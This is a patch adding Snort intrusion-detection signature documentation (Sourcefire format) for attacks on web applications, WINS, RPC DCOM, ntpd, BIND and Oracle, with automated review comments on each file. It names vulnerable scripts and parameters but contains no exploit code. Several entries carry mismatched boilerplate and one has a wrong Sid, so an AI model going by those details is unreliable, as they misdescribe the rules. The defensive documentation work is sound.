+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
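Review bot: this file is a line-for-line copy of the 1131.txt text with only the Sid changed, so the two signatures cannot be told apart from their documentation; each should describe the specific request or application its own rule matches instead of sharing the generic web-server template, and Additional References should not be left empty in both.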
--- /dev/null
+++ b/doc/signatures/3199.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3199
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
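Review bot: Attack Scenarios reads "multiple malformed request" (should be "requests"), Ease of Attack has "Expoit" for "Exploit", and Additional References is empty even though Detailed Information describes a specific Microsoft WINS vulnerability with a four-item affected-systems list; the vendor bulletin the rule was written from should be cited so that list can be verified. "Uninstall the WINS service." is a reasonable mitigation but should be qualified as applying only where WINS is not required.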
--- /dev/null
+++ b/doc/signatures/100000643.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000643
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_rename.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_rename.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
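Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host ...") and the Attack Scenarios text about supplying "his/her own credentials" are pasted from the generic CGI template and do not describe a remote file include; for this rule the scenario is an attacker passing a URL in "admin_template_path" so that template_rename.php includes and executes attacker-hosted code, and that is what the section should say. Also the "--" separators after Sid, Affected Systems and Contributors lack the blank line used elsewhere, and "ona web server" should read "on a web server".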
--- /dev/null
+++ b/doc/signatures/424.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+424
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Request datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Mobile Registration Requests were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 35 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Request datagrams were developed before the development of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 35 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
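Review bot: the Affected Systems section is missing entirely (the file goes from Detailed Information straight to Attack Scenarios), and the argument in Detailed Information is a non sequitur: that these datagrams "were developed before the development of RFC3344" does not by itself mean they should never be seen; the actual point, stated in Impact, is that RFC3344 replaced the ICMP registration messages with UDP/TCP ones, so Detailed Information should say that. The Corrective Action sentence is also missing its full stop.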
--- /dev/null
+++ b/doc/signatures/3001.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3001
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
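Review bot: the Attack Scenarios section is missing (Affected Systems goes straight to Ease of Attack), the references header reads "References:" instead of the "Additional References:" used by every other file, and Detailed Information has "taget" and "excuted" for "target" and "executed". Its opening sentence ("A buffer overflow condition in the Microsoft implementation of the ASN.1 Library.") is also a fragment with no verb.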
--- /dev/null
+++ b/doc/signatures/630.txt
@@ -0,0 +1,51 @@
+Rule: 
+
+-- 
+Sid:630
+
+-- 
+Summary:
+A host has scanned the network looking for vulnerable servers.
+
+-- 
+Impact:
+Information leak, reconnaisance, preperation for automated attack such as worm propagation
+
+
+-- 
+Detailed Information: 
+Synscan is the scanning and vulnerability testing engines for ramen, canserserver and is included in some versions of the t0rn root kit as t0rnscan. It is a very fast syn scanner. 
+
+-- 
+Attack Scenarios: 
+This is a scanning tool that is often the precursor to a worm infection.
+
+
+-- 
+Ease of Attack: 
+This scanner is fast and easy to use. It is readily available and was included with several worms.
+
+
+-- 
+False Positives: 
+sscan, mscan, and several other tools used ID=39426 but the use of SYNFIN is unique to synscan [1.5|1.6]
+
+-- 
+False Negatives: 
+This rule will not generate an event if recent versions of synScan, such as 1.6a, are used because synScan now uses random IP IDs.
+
+-- 
+Corrective Action: 
+Run flexresp with synscan kill.
+
+-- 
+Contributors: 
+Don Smith	Initial Research
+Josh Gray	Edits
+
+-- 
+Additional References:
+
+
+
+--
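Review bot: Corrective Action ("Run flexresp with synscan kill.") is a Snort active-response setting, not remediation; the actionable guidance, given that Detailed Information ties synscan to ramen, canserserver and the t0rn root kit, is to treat the scanning host as suspect and check it for compromise. Also "Sid:630" should be split as "Sid:" / "630" like the other files, "engines" should be "engine", and "reconnaisance" and "preperation" are misspelled.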
--- /dev/null
+++ b/doc/signatures/1218.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1218
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
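Review bot: Affected Systems is empty and the remaining text is the generic authentication template, so the document does not say which server or application the rule's authentication check applies to; name the matched URI or product. "ona web server" in Detailed Information should read "on a web server".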
--- /dev/null
+++ b/doc/signatures/1597.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1597
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
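Review bot: nothing in the body identifies the CGI application or request that sid 1597 matches ("All systems running CGI applications"), so the document cannot help an analyst decide whether the event is relevant; Summary and Detailed Information should name the script and parameter the rule looks for. Also "ona web server" should read "on a web server", and the Detailed Information paragraph has one over-long line that breaks the wrapping used in the rest of the file.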
--- /dev/null
+++ b/doc/signatures/312.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 312
+
+--
+Summary:
+This event is generated when an attempt to exploit a buffer overflow condition in ntpd is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of the Network Time Protocol Daemon (ntpd) are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Ntp is used to synchronize system time with a time server. This may also be used on various network devices.
+
+Affected Versions:
+	ntpd versions prior to an including 4.0.99k
+	xntpd and xntp3
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414
+
+Bugtraq:
+http://www.securityfocus.com/bid/2540
+
+--
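Review bot: the "Affected Versions:" block sits inside Detailed Information without a "--" separator, so it is not a section in the sense every other file's "Affected Systems:" heading is; give it its own separator and the standard heading. "prior to an including 4.0.99k" should read "prior to and including", "compromize" should be "compromise", and Attack Scenarios ("Exploit scripts are available") merely repeats Ease of Attack instead of describing the scenario, which per Detailed Information is an attacker sending input that overflows the buffer in ntpd to obtain a root shell.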
--- /dev/null
+++ b/doc/signatures/1478.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1478
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
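Review bot: this file is identical to 1597.txt apart from the Sid, so the documentation for sid 1478 does not distinguish it from any other CGI rule; replace the generic template with the specific script and parameter the rule matches. "ona web server" should read "on a web server".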
--- /dev/null
+++ b/doc/signatures/1593.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1593
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
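Review bot: this is a third verbatim copy of the generic CGI template (same text as 1597.txt and 1478.txt, Sid aside), so sid 1593 is undocumented in any useful sense; state which script and parameter the rule matches, and fix "ona web server" to "on a web server".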
--- /dev/null
+++ b/doc/signatures/2352.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
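Review bot: the Sid field says 2192 but the file is 2352.txt; one of the two is wrong and the mismatch will break any tooling that maps a sid to its document by filename, so it needs to be resolved before this is merged. Also "Billy/Blaster" does not match the name used by the cited Symantec page (W32.Blaster), "Expoit" should be "Exploit" and "propogate" should be "propagate".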
--- /dev/null
+++ b/doc/signatures/3153.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+3153
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using TCP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+TCP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
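Review bot: Summary says the event fires on "an inverse query attempt ... using TCP" but Detailed Information speaks only of "malformed transactions" and never connects the inverse query to the heap overflow, so the reader cannot tell why a TCP inverse query is the trigger; state that the overflow is in BIND 8's inverse-query handling. Affected Systems ("Bind 8.") gives no version range and Additional References is empty, so the affected-version claim cannot be checked.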
--- /dev/null
+++ b/doc/signatures/2603.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2603
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "create_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
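Review bot: this file is the 2632.txt text with the procedure and parameter names swapped ("create_mview_repgroup" and "fname"), so it inherits the same defects: Ease of Attack says "Simple." while Attack Scenarios requires a valid database login, "a Oracle database implementation" should read "an Oracle database implementation", and the $ORACLE_PORTS instruction is a Snort configuration note sitting inside the vulnerability description.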
--- /dev/null
+++ b/doc/signatures/100000553.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000553
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHPMySMS" application running on a webserver. 
+Access to the file "gateway.php" using a remote file being passed as the 
+"ROOT_PATH" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "ROOT_PATH" parameter in the "gateway.php" script used 
+by the "PHPMySMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMySMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
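Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host...") and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials...") describe an authentication-bypass rule, not the remote file include in "gateway.php" via "ROOT_PATH" that the Summary describes; drop or replace that boilerplate so the scenario matches the vulnerability. Typos in the same paragraphs: "ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", and "an exploitation attempt has been attempted" is redundant. Style: the other files put a blank line before each "--" separator; the ones after the Sid value, after Affected Systems and after Contributors are missing here.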
--- /dev/null
+++ b/doc/signatures/100000336.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000336
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "footer.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "footer.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
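Review bot: as with the other remote-file-include entries, the third paragraph of Detailed Information and the Attack Scenarios section describe credential validation and an "authentication mechanism" rather than a remote file included through the "ROOT_PATH" parameter of "footer.php"; the text should explain that the parameter is used as a path to include() and that a URL supplied there lets a remote script run on the server. Same wording fixes: "ona web server", "attackers choosing", "exploitation attempt has been attempted". The two blank lines before "Rule:" at the top of the file should go, for consistency with the other files.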
--- /dev/null
+++ b/doc/signatures/1536.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1536
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
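Review bot: the Affected Systems section is empty; every other entry in this patch lists something, so either give a general statement ("Any web server or web application exposing an authentication mechanism") or state that the rule is generic and not tied to one product, otherwise the empty heading looks like a truncation. "ona web server" in Detailed Information should read "on a web server".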
--- /dev/null
+++ b/doc/signatures/100000858.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000858
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "text" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "text" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
